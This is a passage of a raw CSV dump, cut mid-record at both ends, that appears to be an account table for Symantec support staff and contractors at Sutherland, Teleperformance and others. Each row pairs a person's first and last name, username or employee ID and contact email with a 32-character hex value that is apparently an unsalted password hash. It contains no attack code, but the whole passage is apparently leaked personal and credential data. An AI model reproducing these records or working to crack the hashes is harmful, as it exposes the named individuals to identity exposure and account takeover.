,332bca063a76aef7ec4e808ed4468645,MayMorata,<blank>,085752,Gladys,NULL,NULL,NULL
3c4e-4b44-acc7-a2826499a7bd,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,096f5b6b1cca0ecbb4a6fd88832764eb,Gomes,<blank>,074747,Valenie,NULL,NULL,N
ULL
3b6a-4f58-9c7c-78698e577adb,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,39dc96a83a812ba4d302311055fd9d22,CarlosTrasmonte,<blank>,085764,Juan,NULL,NULL,
NULL
3655-4a84-84b8-eb63da545d3b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,889849e15dfa555d972008894cdb494a,P,<blank>,086110,Bincymol,NULL,NULL,NULL
0c3-4afd-b26c-4f909d42717f,<blank>,85674,Tools_id@symantec.suth.com,Sutherland G
lobal Services,8db530da1ce71af0eae17a26150fb9eb,Hinsperger,<blank>,dana_hinsperg
er,Dana,NULL,NULL,NULL
81ed-4e53-b1e3-498c89c3bba2,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,c93a39dcbf9b321b679ec569ed59935f,Liu,<blank>,christopher_liu_cc,Christoph
er ,NULL,NULL,NULL
5e9-4dd4-804f-33053f4702b8,<blank>,85695,Tools_id@symantec.suth.com,Sutherland G
lobal Services,525905aab44cadfe6f84f9738380d165,Amorocho,<blank>,yunner_amorocho
,Yunner,NULL,NULL,NULL
b31-44e5-a5f6-368440fbb817,<blank>,<blank>,nrobbins@symantec.com,Symantec,7df369
054f21738568b71607c6f0233a,Robbins,<blank>,nathan_robbins,Nathan,NULL,NULL,NULL
c906-48d8-95eb-42a221962ee5,<blank>,EMPROV,tools_id@symantec.com,Sutherland,71d4
eae9de3ef260a1bc4d821c8a4770,Abraham,<blank>,095670,Jilu,NULL,NULL,NULL
4ed-4d01-bd41-7a11567c51fb,<blank>,74174,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",b1b6b41c6f60ef8ceb02b30c1aea0a51,R,<blank>,pradeep_r,Prad
eep,NULL,NULL,NULL
8a18-4800-bed0-cf6eb60fbff0,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,ad777e5a8db1831d525e59bab2dcf63e,Gravel,<blank>,085683,Joseph ,NULL,NULL,NULL
d56-4ea5-a09d-ba6444d82311,<blank>,89789,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",ce365ec5d82a9c522221566cadebab6f,G ,<blank>,shalini_g,S
halini,NULL,NULL,NULL
3128-44d1-81d3-48f8ec21675a,<blank>,<blank>,tools_id@symantec.suth.com,4th Jan 2
012 - PR - CRQ000000486483,153977fe83ff4593ddac9ff1442be87a,Kumar,<blank>,123296
,Dinesh,NULL,NULL,NULL
b5c6-4031-9692-1612561a4199,CRQ000000236125-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,b84908b403fe092b178e9e9e7ea82f63,Beberino,<blank>,114695,
Leonardo,NULL,NULL,NULL
38f8-4f26-8c40-8146dfbbe283,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,75be54d50809cc53207947de3c219bba,Bangayan,<blank>,venchito_bangayan_cc,Ve
nchito ,NULL,NULL,NULL
88bb-4687-975a-229318b1a069,CRQ000000513226--vmd--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,2f6f172df17363962cd16a87cc93dc2c,Castronuevo,<blank>,
123672,Nur,NULL,NULL,NULL
9a26-4971-ac4d-3a42741b5d34,CRQ000000513229--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,dd9646f115439490724ad8e030024244,Cimagala,<blank>,123
673,Merrynel,NULL,NULL,NULL
20f-406f-862b-9765f6ff64fe,<blank>,90079,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",a0882c7285f43f5eda5bc414fd043a3d,Venkateswaran,<blank>,ar
un_venkateswaran,Arun,NULL,NULL,NULL
57ac-4ef3-bc08-d7fe178ef513,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,9026401d8f32ed1b7409caee79b98913,Poliquin,<blank>,085679,Natasha ,NULL,NULL,NUL
L
c282-4568-874a-9957bfce11d3,CRQ000000513245--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,53f4fdbf05d37588a6cd11943ddd3063,Tan,<blank>,123678,R
on,NULL,NULL,NULL
09f6-43d2-b9e1-7282b927b62d,CRQ000000518278--vmd--24/01/2012,000-000,tools_id@sy
mantec.suth.com,Sutherland,d552f5dd06dbb5b7f2ea0d4c7e0ad321,MohananNairRemadevi,
<blank>,104600,Anoop,NULL,NULL,NULL
873c-4bcb-bd9b-d94d4654bae7,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b0cc0fee59b87a8c41729d6f24b17b4a,Sterling,<blank>,085723,Chris,NULL,NULL,NULL
289a-4ed9-8afe-9f007f1bf2a0,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,08e017c4f9e0a17e3564c3f08df2bb49,Pullo,<blank>,085712,Daniel,NULL,NULL,NULL
ca27-4cbe-8b60-e273efc487f9,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6b9de32fe69641e3447d6149de672dad,Malik,<blank>,085713,Adnan,NULL,NULL,NULL
54ee-465e-9d7d-aa7904e538d8,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b2720aa41fc28685ff0e7bebdd751703,Gumban,<blank>,085750,Avelino,NULL,NULL,NULL
e142-4c80-b25b-217f81b19a76,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,86f92acd8b09589976a362daa1464fc6,Meloche,<blank>,083130,James,NULL,NULL,NULL
4226-47c0-ae12-93e9a373cbc5,<blank>,EMPROV,tools_id@symantec.com,Sutherland,4937
28e08117bbc42aa0ca83efe67a4b,Sivaramakrishnan,<blank>,095660,Raajesh,NULL,NULL,N
ULL
5eb-4ffb-a267-6d9874c3c07c,sms 29,90015,Tools_id@symantec.suth.com,"Sutherland G
lobal Services, Inc.",45a23e663644d40a1891078a94fd74d9,Shankar Tripathy,<blank>,
gourishankar_tripath,Gouri,NULL,NULL,NULL
27a2-48b2-b1dc-a733242d0f5c,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,3af3619c257460cb63f303d8aaf77a67,Frechette,<blank>,085702,Stephane,NULL,NULL,NU
LL
ab8c-423b-ac5b-ba8faf0287a5,SSS 18/12/09,EMPROV/INC75603,accounts@symantec.telep
erformance.gr,Teleperformance,c1565a6c420f07b744b8c5917267cca2,Skordoulis,<blank
>,096895,Cathy,NULL,NULL,NULL
373-40a4-88fb-238ca4627725,<blank>,86268,Tools_id@symantec.suth.com,Sutherland G
lobal Services,a9300cfb4aa6f77af64abf0b31fa74a6,Dawood\xa0 Sheriff\xa0,<blank>,s
hanawaz\xa0dawood\xa0_she,Shanawaz,NULL,NULL,NULL
dcf7-4d1a-bc91-1efd18a4d080,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,3e7b98c25cf137c13cea584d51def21f,Sixta,<blank>,rose_sixta_cc,Rose ,NULL,N
ULL,NULL
cc2e-42f4-aff3-76b6ebba2a11,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,e8cb5226f5d2a3157c624ff78578fd1b,Cerbatos,<blank>,irish_cerbatos_cc,Irish
,NULL,NULL,NULL
e8f6-4386-8ae6-057666e19f02,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a524ee42206446cebe536e55a1215b8d,Dubeau,<blank>,085714,Carole,NULL,NULL,NULL
d1c-4df3-ba1c-7d8381634921,<blank>,87413,Tools_id@symantec.suth.com,Sutherland G
lobal Services,3b90e18b0370dc3b69c244659dd2afb6,Ramani,<blank>,arasananthan_rama
ni,Arasananthan,NULL,NULL,NULL
a9a5-4c4d-af9a-f321bfb85e81,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b59cb3292a146247934120134efe6cd1,Borje,<blank>,085740,Laurice,NULL,NULL,NULL
b9b0-489b-8a53-84fe16fed999,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,c924a8490595f1757ec9ec58119d6bf3,Cabarles,<blank>,085741,Nina,NULL,NULL,NULL
01a-4977-ae43-9afb601223c9,<blank>,88494,Tools_id@symantec.suth.com,Sutherland G
lobal Services,84a0e082b2f73b7616b622d4e6805cc4,Flood,<blank>,paul_flood,Paul,NU
LL,NULL,NULL
f4b3-49a3-b528-bbb6df006f7e,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a2ac151801e7aed4efc315a943d666f2,Cardenas,<blank>,085744,Marichris,NULL,NULL,NU
LL
ce4-4cad-b5ea-529038f35274,<blank>,86864/INC51865 ,Tools_id@symantec.suth.com,Su
therland Global Services,2c005013410f5bd3625a0470ff5bec7b,Skidmore,<blank>,jason
_skidmore,Jason,NULL,NULL,NULL
257-4b61-bbe1-7dc1e212dda7,<blank>,88497,Tools_id@symantec.suth.com,Sutherland G
lobal Services,511335f82cf58b7faa4d0c63ff776ece,Caccamo,<blank>,rosy_caccamo,Ros
y,NULL,NULL,NULL
0e2f-4ab7-b61c-82a2d9964496,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,da136559fbb8b18bd90e80fccec08402,Alcaide,<blank>,jim_alcaide_cc,Jim ,NULL
,NULL,NULL
a46-4d0c-ab2a-2b72ef619f45,<blank>,88514,Tools_id@symantec.suth.com,Sutherland G
lobal Services,c346a1c95fd83d2a697e2002ae726fa4,Plante,<blank>,brittany_plante,B
rittany,NULL,NULL,NULL
8db2-490a-b2e8-6c9c5a0cc65b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,5f8d3a55e20cb01a1e26ce6737883a6e,Bilton,<blank>,085729,Kenneth,NULL,NULL,NULL
9efa-4985-be6b-68f23f847d7e,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a8e8c76a6b15a9a8ce2847e1fe47560e,Fox,<blank>,083137,Sean,NULL,NULL,NULL
09ee-4cb5-8d38-463d68e7f5b0,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,784d4e500fbb01a94fd5910e4983e73c,MarieSerra,<blank>,085760,Richille,NULL,NULL,N
ULL
5f8f-45ab-a3d4-feb84a3c553f,sms 29,EMPROV,Tools_Id@symantec.Suth.com,Sutherland,
09bb60bcc151d4f77fd14d1721d6d860,KumarK,<blank>,091708,Ganesh,NULL,NULL,NULL
7047-485a-8f4d-d8815e037889,WS 22-07-2010,INC000000223553,tools_id@symantec.suth
.com,Sutherland,b4c2396708aa84266b2e75f6822d49a1,Vedala,<blank>,094890,KranthiSa
ndeep,NULL,NULL,NULL
a1aa-40c6-a2bf-2c376fe17b1c,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,070d3e9ecc638f164b76bc8a0280900c,Hejeebu,<blank>,ravi_hejeebu_cc,Ravi,NUL
L,NULL,NULL
ee1c-402c-ba1e-b9dd38748770,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,6599733bdfd93a3986122b77e7e2fe1b,McLeod,<blank>,085707,Ian,NULL,NULL,NULL
da74-47ee-bfbc-df450daba2c4,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,2a192992eadca351119c26f6335348ec,Umali,<blank>,110076,Rich,NULL,NULL,NULL
7b6b-46e7-ae28-5bc1501f1b02,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,521679c29cdde38f06ef52b411d96767,Contemprate,<blank>,085746,Phoebe,NULL,NULL,NU
LL
790-447a-b39f-f21ffde8678e,<blank>,089650,Tools_id@symantec.suth.com,Symantec,ec
7fc6e8e3b1ccd3c46a619960088f96,Kiranv,<blank>,089650,Vijai,NULL,NULL,NULL
8af5-4e8f-be66-adb4cd89cea8,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,bfb7e9c72115c6c178199d6eca8dafb7,Goncalves,<blank>,083100,Marlena,NULL,NULL,NUL
L
50ad-4b22-a2e2-0952d630cc4a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,fc849ebe177456fb5f1550a772af24eb,Racho,<blank>,085757,Ma. Katrina,NULL,NULL,NUL
L
dc2-463c-9316-85bf00606efd,<blank>,090652/2633251,Tools_id@symantec.suth.com,Sym
antec,a2b728762add720737e177e0620fa741,Singh,<blank>,ankur_singh,Ankur,NULL,NULL
,NULL
7369-45a2-8c27-c697090c8541,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,5db5f058884c403b260411aeba624b59,Aquino,<blank>,110059,Ezekiel,NULL,NULL,NU
LL
9dc5-49e5-ac29-d421ed751916,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,35b05e81f3728552eec5a8489368b1c2,Jadhav,<blank>,086347,Santosh K,NULL,NUL
L,NULL
aacb-47e2-b047-add636b1beb4,sms 29,CRQ000000109311,tools_id@symantec.suth.com,Su
therland,698e5b3f599b435c3946b51b046188be,Kattassery,<blank>,106548,TonyJoseph,N
ULL,NULL,NULL
b2b8-4b53-bf00-3d7fc1c37cab,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,a8c4de12c958c2cff34973aa59b35816,Murali,<blank>,074547,Dharan Jayaraman,N
ULL,NULL,NULL
a1d0-469c-ae54-b08a022bf0c4,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,35b29fe8cefd947b2109397e5aee198c, Lebherz,<blank>,085686,Leni,NULL,NULL,NULL
f894-4125-9f95-cef5164b9ad4,PMP 30-11-09,EMPROV,tools_id@symantec.suth.com,Suthe
rland,8c2641ae753573c58b03c7b3026ee99b,JSixta,<blank>,096802,Rose Marie,NULL,NUL
L,NULL
4bac-434c-8f0b-30a43a3db645,<blank>,EMPROV,accounts@symantec.teleperformance.gr,
Teleperformance,b0e677a9d6bb5a50efa4bd9727758473,Rasulov,<blank>,098684,Orkan ,N
ULL,NULL,NULL
277-4372-a673-2e573647dd3e,<blank>,88506,Tools_id@symantec.suth.com,Sutherland G
lobal Services,dbd54e1ed27a486583fad2c0ec4cf096,Toney,<blank>,tillica_toney,Till
ica,NULL,NULL,NULL
3586-4e19-8396-582e990cb3e7,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,a811c416975023af5cee5608d7a280c5,Torres,<blank>,ermelinda_torres_cc,Ermel
inda,NULL,NULL,NULL
b249-4787-bda1-f8b46c59b113,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
Global Services,0142a551d96cc69560273517a7cd8857,Charonneau,<blank>,085698,Juli
an ,NULL,NULL,NULL
79c-4274-be7f-0d1550868b03,<blank>,88462,Tools_id@symantec.suth.com,Sutherland G
lobal Services,e544b589da69eb8f6f3704bbd54ec590,K,<blank>,vivek_k,Vivek,NULL,NUL
L,NULL
b9e-46d9-968e-4c559da338b0,<blank>,75284,Tools_id@symantec.suth.com,Sutherland G
lobal Services,8a5c06423e227a09b32a50b9347088df,G,<blank>,asha_g,Asha,NULL,NULL,
NULL
ed9-4665-8feb-b29fe6cdedde,<blank>,2633288,Tools_id@symantec.suth.com,Symantec,9
0b582405d3917e399fa0810b5f4bf85,Shee,<blank>,biswarup_shee,Biswarup,NULL,NULL,NU
LL
41c1-4bd7-a723-abad1167f98b,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,8e7af46abb912ac1cb5fd6d083236896,Esaterly,<blank>,085806,Todd,NULL,NULL,NULL
22f-40e4-ab98-11141e5c322c,<blank>,2633282,Tools_id@symantec.suth.com,Symantec,5
c33d0ebfdfe044bbb08e6a641ce6f45,Shetty,<blank>,ganesh_shetty,Ganesh,NULL,NULL,NU
LL
3472-46a3-8614-14adbb501423,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,1fb0dcefb6f6fae2eb89a38c34ae48c1,Murray,<blank>,085805,Kelly,NULL,NULL,NULL
2a87-4eb2-aecf-4048515f4e21,03/06/2010 - SPJ,EMPROV,Michel_Bensadoun@Symantec.Co
m,Symantec,a258e4fd24a94a6f7ff0c0f19cb3448c,Janssens,<blank>,036059,Philippe,NUL
L,NULL,NULL
7f9f-4002-982b-7d95fab96ea2,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,c8f7b11027b1a2e220739dd5d221176b,Navales,<blank>,086849,Jennylyn Cuevas,N
ULL,NULL,NULL
9d8-49ec-ba55-e0697161c2a4,<blank>,88495,Tools_id@symantec.suth.com,Sutherland G
lobal Services,223c1c4a747033f8e147286591921207,Sobota,<blank>,wayne_sobota,Wayn
e,NULL,NULL,NULL
aa7-41e9-b032-a9c208e9ccd6,<blank>,88501,Tools_id@symantec.suth.com,Sutherland G
lobal Services,8b4ee917ed6d970e2d31ae17d110fbf9,Basar,<blank>,khairul_basar,Khai
rul,NULL,NULL,NULL
8f5b-4ebf-b317-b41dd480e2d2,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,ea9d5e4fee0616eb1a4c0c12df238449,Gustilo,<blank>,093233,Ryan,NULL,NUL
L,NULL
959b-4e4b-9cdb-a15862ccdd80,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,90a4d97d096400742905802b30c59f64,Medado,<blank>,093236,Virmari Ann,NU
LL,NULL,NULL
ce2-44c1-a347-66ce3d97f437,<blank>,090484/2633251,Tools_id@symantec.suth.com,<bl
ank>,b47ff9e09cc0725e7c3fa7daca8c5d41,Joshi,<blank>,kenny_joshi,Kenny,NULL,NULL,
NULL
af43-4915-a8f4-7073df5e57d6,<blank>,7079,azhar_v_m@symantec.com,Sutherland,3ab34
0747492dc75b1111e5a44e97968,V M,<blank>,094306,Azhar,NULL,NULL,NULL
4a2-47d8-bd38-d7922246f5b4,<blank>,090653/2633282,Tools_id@symantec.suth.com,Sut
herland,9e552327e979433506ab57a97a118cd9,Dhami,<blank>,apurva_dhami,Apurva,NULL,
NULL,NULL
a0d2-4c2a-bc0b-466f9421d4ff,bpr-29-06-10,INC204646,Suchit_Tripathy@symantec.com,
Symantec,8edd33d790d7f151cdcf1cc2fa8106a7,Singh,<blank>,075408,Yogender,NULL,NUL
L,NULL
efde-43b0-ba54-b0bfe367859b,<blank>,INC213479,tools_id@symantec.suth.com,Sutherl
and,66bf1b8231182bf0112995c70c1f9fac,CG,<blank>,075893,Nagaraju,NULL,NULL,NULL
6e60-47a4-95e8-0f67c035cfb2,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,91b4061e8daf0fca3da6ff8be179e056,Masse,<blank>,085684,Eric ,NULL,NULL,NULL
3c91-4d1b-9953-2a4b694e3990,<blank>,EMPROV,James_Simas@Symantec.com,Symantec,d15
7b79d12b3feb88b5ea704453d31e2,Simas,<blank>,094931,James,NULL,NULL,NULL
747f-45c5-a379-6c0d26131a2f,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,468539db1e8adb05fb79f7a8fe8febda,Geary,<blank>,085722,John,NULL,NULL,NULL
a938-41de-b70b-aae5137fb284,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,2c8397e8e86e774cab3614b12cc7cefc,Pastorius,<blank>,085728,Jason,NULL,NULL,NULL
fead-4ff9-9a9d-847bab20e81f,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,9498bc95ec0adc9c95492c7044666ef5,Doronila,<blank>,reden_doronila_cc,Reden
,NULL,NULL,NULL
2583-4d9b-880a-f0e2855bc105,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,799ced6ec961a99334b5d3cc865fecd6,Guzman,<blank>,075107,Paul,NULL,NULL
,NULL
da42-41b7-aacb-2d0386a4f695,CRQ000000321134,<blank>,tools_id@symantecsuth.com,Su
therland,8524e18ab63f4d1c031c3543fd40d87e,Kumar,<blank>,115931,Pavan,NULL,NULL,N
ULL
5371-47bb-a994-f4605654bfc8,RM - 19 dec 2011-CRQ000000459909,<blank>,tools_id@sy
mantec.suth.com,<blank>,4113bdc5941281bcd7a631222258fbba,Chhabria,<blank>,123207
,Komal,NULL,NULL,NULL
ab9-4b50-9bac-d789194098fa,<blank>,089064,akita_jien@symantec.com,<blank>,e06b10
7550aaaab3da17275fccacfd05,Jien,<blank>,akita_jien,Akita,NULL,NULL,NULL
b8ed-4838-a7c1-6f5d3c8afb6d,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,aee887773ef948806e8ba41f2cfc40fe,Turner,<blank>,085700,Annette,NULL,NULL,NULL
c915-4cd4-8070-d51fd4d4c04c,CRQ000000247880,<blank>,tools_id@symantec.suth.com,K
SC-04/28/2011,36fac1ff7a51aa0855aca91beb68c161,Guilas,<blank>,115587,PaulSigmund
,NULL,NULL,NULL
66e0-4f2f-b792-14e6cacdbbb8,SRB 18.08.2010,CRQ000000110585,anjan_kundu@symantec.
suth.com,Symantec,ad151f9328212a4f03d2137d79034678,Kundu,<blank>,107673,Anjan,NU
LL,NULL,NULL
ed7e-4a5b-96a0-4e06b09df7fa,CRQ000000460048 SP 21 DEC 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,1626ea88ec33f1d84a512613f5cce8db,Ching,<blank>,123193,
Melanie Arra Sexcion,NULL,NULL,NULL
ddde-4752-a44f-68bb1720e173,CRQ000000460057 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,b8d65a3a5a27da812e024e8cab6d5634,Cinas,<blank>,123196,
Theresa Joy Pulluan,NULL,NULL,NULL
5e4-4fb7-b67e-0beb205423fc,<blank>,074547/2635104,tools_id@symantec.suth.com,Sym
antec,48afd843993ab9f4ab06344afd497c9e,JayaramanMurali,<blank>,dharanjayaraman_m
ura,Dharan,NULL,NULL,NULL
6c1-4480-8870-368025293b1d,<blank>,090923,Tools_id@symantec.suth.com,Symantec,26
b13f3553a1de63303ed489035d8c55,V,<blank>,gopalakrishnan_v,Gopalakrishnan,NULL,NU
LL,NULL
59df-402f-86d3-0661b3984ae4,CRQ000000460144 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,ebf54011e0f541a8c81d447c0ed3ec98,Cardena,<blank>,12322
5,Maria Regina Gutierrez,NULL,NULL,NULL
c7b6-4ee7-8a58-0a1f8a56da6a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,0e0fa6eed5faa4a3855d9f15bf3ac2c6,Lane,<blank>,083138,Sean,NULL,NULL,NULL
999a-432e-bafb-cc2dc17cc0d9,CRQ000000322893-CLNP-18/08/2011,000-0000,rosaliemedi
na_lopez@symantec.suth.com,Sutherland,689a87b8f5f5fa3bef5fe73f03620d38,Lopez,<bl
ank>,119734,RosalieMedina,NULL,NULL,NULL
2510-4728-ad3f-99b9a3f48f49,CRQ000000461260 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,cf09ceff49d8a04a43079bc5f8bd9a96,Victorino,<blank>,123
245,John Paul Tapia,NULL,NULL,NULL
fa38-4c2d-8f8c-1bf6837aa52a,08/04/2010 - SPJ,EMPROV,Winnie_Fu@symantec.com,Syman
tec,cccfb8ef3b0c0813c5a2e261794abe28,Gong,<blank>,103011,Emily,NULL,NULL,NULL
4b3-40fc-a58b-a244fa90dba9,<blank>,089646,Tools_id@symantec.suth.com,Symantec,d0
4c27bd177b9baa24e71357d3fc8019,Srikanthk,<blank>,089646,Sampath,NULL,NULL,NULL
0e4-491f-b903-da68efaf349c,<blank>,2633282,Tools_id@symantec.suth.com,Sutherland
,efd8fa663f2640a9da404f591e803c1d,Sayed,<blank>,wajahatali_sayed,WajahatAli,NULL
,NULL,NULL
4668-4a6c-a6e4-9a28e64de0b9,SSS 03/12/09,EMPROV\\INC 63679,symantec_2nd_maa@tp-t
ec.nl,TPH,1eebded8ddb5d5be804f15828ee2338f,Dalton,<blank>,096388,Cordelia,NULL,N
ULL,NULL
415d-4eb7-a618-35cb74bdcbf1,BPR,EMPROV,accounts@symantec.teleperformance.gr,Tele
performance,0e3911f4ea5bdcd17aad800cc940ac13,Sawasciuk,<blank>,096898,Dariusz,NU
LL,NULL,NULL
a39e-48db-8c46-4fe262fe319d,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,62055e4f7b2c25415776610fdc580459,Krishnan,<blank>,086260,Balasubramanian,
NULL,NULL,NULL
a344-4153-9ac1-070a704d1b85,sms 29,INC000000251655,tools_id@symantec.suth.com,<b
lank>,fc29777d813853e6f3948ae8d6031087,Pillai,<blank>,093354,Jayanti,NULL,NULL,N
ULL
b925-4a13-873c-18d0d14aebb2,sms 29,INC64119,Tools_Id@Symantec.Suth.com,Sutherlan
d,2c5ea53fed58fb08e0115540bf843358,CeroAve,<blank>,085771,Micholle Bernie,NULL,N
ULL,NULL
3c9-4eae-89c0-6cf7bc5dcc11,<blank>,089477,Tools_id@symantec.suth.com,Symantec,64
39554133aff8686c0b713503411a86,Kumar,<blank>,vimal_kumar,Vimal,NULL,NULL,NULL
7c24-491e-877b-39194f93458c,04/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,53230a0b3725b2dd80bcbc6af49a39bf,Rosario,<blank>,100735,Raymund,NULL,N
ULL,NULL
fcf-4357-afd4-216ed1e962ec,<blank>,090914,Tools_id@symantec.suth.com,Symantec,3a
6b441552f37a0fb15c24805efcd688,CH,<blank>,bharini_ch,Bharini,NULL,NULL,NULL
c1f1-432c-a7b3-dc2d557eba27,SRB 16.08.2010,CRQ000000109058,tools_id@symantec.sut
h.com,Sutherland,402255c75535d87dc138390112c7d43a,GVS,<blank>,107931,Prasad,NULL
,NULL,NULL
3930-4372-a0f4-6f35a38e91b0,24/03/2010 - SPJ,EMPROV,Pramut_Sriwichian@symantec.c
om,Symantec,206328b9a8796e2d6a55d301665284fa,Watcharasirisuk,<blank>,100769,Kano
kporn,NULL,NULL,NULL
e5a7-4605-be34-74fac2655a88,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,a68faa18bd31e489fd7fc2c1fc6522f7,Begum,<blank>,089502,Nazleen,NULL,NULL,NULL
3fab-4de4-acb6-1a083245f5ac,CRQ000000415025--VMD--21/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,b8c0969db84e5ddd1daeee05553b816a,Macktal,<blank>,1225
19,Joseph,NULL,NULL,NULL
7483-4ce9-9e17-957cac3eec67,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,d
2380f9f54c13f276f146bcc3542c816,Lourdu,<blank>,100810,SureshBabu,NULL,NULL,NULL
5419-4a6d-ae44-35b2f3ee5b7c,<blank>,<blank>,todd_carlstrom@symantec.com,Symantec
,bd45fbe76b59f83e838581525c19df60,Carlstrom,<blank>,todd_carlstrom,Todd,NULL,NUL
L,NULL
29f0-4192-ac6d-c2f13437f461,CRQ000000425788--VMD--29/11/2011,000-000,nh.symantec
@teleperformance.com.ar,Teleperformance,55258032068a0b31888d8f9a13189dbf,S\xe1nc
hez,<blank>,121797,Ezequiel Javier,NULL,NULL,NULL
2b4b-44d2-9276-5dd1aa1cbdf9,<blank>,<blank>,jason_fenley@symantec.com,Symantec,3
32a100e047494fc8264b13b19768bc7,Fenley,<blank>,jason_fenley,Jason,NULL,NULL,NULL
781e-4b88-b99c-aaa4f84d7664,SSS 24.02.10,EMPROV,tools_id@symantec.suth.com,Suthe
rland,c21f02e1d2c91073979d5c99c06a7f85,Vsuth77031,<blank>,099872,Elavarasi,NULL,
NULL,NULL
afb7-459d-b669-cb54f231e945,<blank>,<blank>,jason_jackson@symantec.com,Symantec,
a44d74325a6bcb1ab319a78360968ee6,Jackson,<blank>,jason_jackson,Jason,NULL,NULL,N
ULL
0983-4ab9-81c0-b8a9a9643f38,sms 29,EMPROV,tools_id@symantec.suth.com,Sutherland,
cc8da7c91fd46802d3ac22dfebc8517f,Kurup,<blank>,099902,Vivek,NULL,NULL,NULL
ddaa-40c2-b83b-e343a646d506,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,d
ce749577cad16219a9ef8a5b86849db,james,<blank>,100877,Sharon ,NULL,NULL,NULL
54c6-4fab-affe-f92bf57a1a80,SRB 19.05.2010,EMPROV,Symaccount@neusoft.com,Neusoft
,34cbd582e98a02132d1651272dac47dd,Song,<blank>,104696,Li,NULL,NULL,NULL
19f8-482b-8913-d8207700f00a,bpr-19-05-10,INC175643,tools_id@symantec.suth.com,su
therland,e74a88dc0f6f095a38c4a83a3ea8c5bc,Jovenes Gayares,<blank>,097841,Gale Fr
ances,NULL,NULL,NULL
bbc9-4c56-93a9-e78bc584c28c,01/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,ae2b7985bba321cf441261161a9b1f06,Young,<blank>,100102,Maribeth,NULL,NU
LL,NULL
f3fa-426f-a8db-43b14b194727,SRB 18.06.2010,INC000000197662,Tools_Id@Symantec.Sut
h.Com,Sutherland,2d7a8351ae0fbcdf7d8e4be1f623b0a8,QParreno,<blank>,100155,Glennd
a,NULL,NULL,NULL
c236-4483-a106-85a67a5c36f0,SRB 19.05.2010,EMPROV,Symaccount@neusoft.com,Neusoft
,d514541a3966316b9b80db177ecd4a5e,Chen,<blank>,104695,Qing,NULL,NULL,NULL
eb8b-40f1-ad67-6f1b3767cb17,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,c
9fc45749a0f592524124ed7d108acc4,Sekar,<blank>,111900,Sathyanarayanan,NULL,NULL,N
ULL
c116-4238-a405-9575fef6b98e,VB=05/10/2010,<blank>,tools_id@symantec.suth.com,Sut
herland,fb9dda257425ce4d17986c098fe5a882,Allada,<blank>,109368,Praveen,NULL,NULL
,NULL
937a-4464-b3d1-8fab053dc480,AP-10/01/11,<blank>,tools_id@symantec.suth.com,<blan
